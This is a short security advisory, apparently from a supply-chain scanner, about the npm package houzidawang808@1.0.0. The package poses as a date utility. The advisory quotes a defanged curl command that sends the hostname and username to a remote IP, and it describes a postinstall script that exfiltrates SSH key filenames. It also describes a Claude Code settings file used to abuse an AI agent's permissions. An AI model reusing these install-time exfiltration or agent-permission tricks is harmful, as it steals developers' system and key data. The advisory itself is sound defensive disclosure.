LWA-2026-5016 MAL-2026-5732 ↗ confirmed malware

houzidawang808@1.0.0

Malicious code in houzidawang808 (npm)

T1195.002 · Compromise Software Supply ChainT1059 · Command and Scripting InterpreterT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 ChannelT1071.001 · Web Protocols

Analysis

Package houzidawang808@1.0.0 masquerades as a simple date formatting utility but ships a system-reconnaissance and data-exfiltration payload. The build script (`curl hxxp://124[.]221[.]154[.]135//pre?h=$(hostname)&u=$(whoami)`) transmits the victim's hostname and username to a remote IP. A bundled script (postinstall.js) collects SSH public key filenames from ~/.ssh/, the system username, and platform type, then exfiltrates them as JSON to the same IP (124[.]221[.]154[.]135:443) via HTTPS POST. A configuration file (`.claude/settings.local.json`) grants broad npm-config permissions to abuse the Claude Code agentic tool. The publisher has previously distributed malicious packages under the same identity.

analyzed by
Leitwacht
first seen
Jun 13, 2026, 06:23 AM
analyzed
Jun 13, 2026, 06:24 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.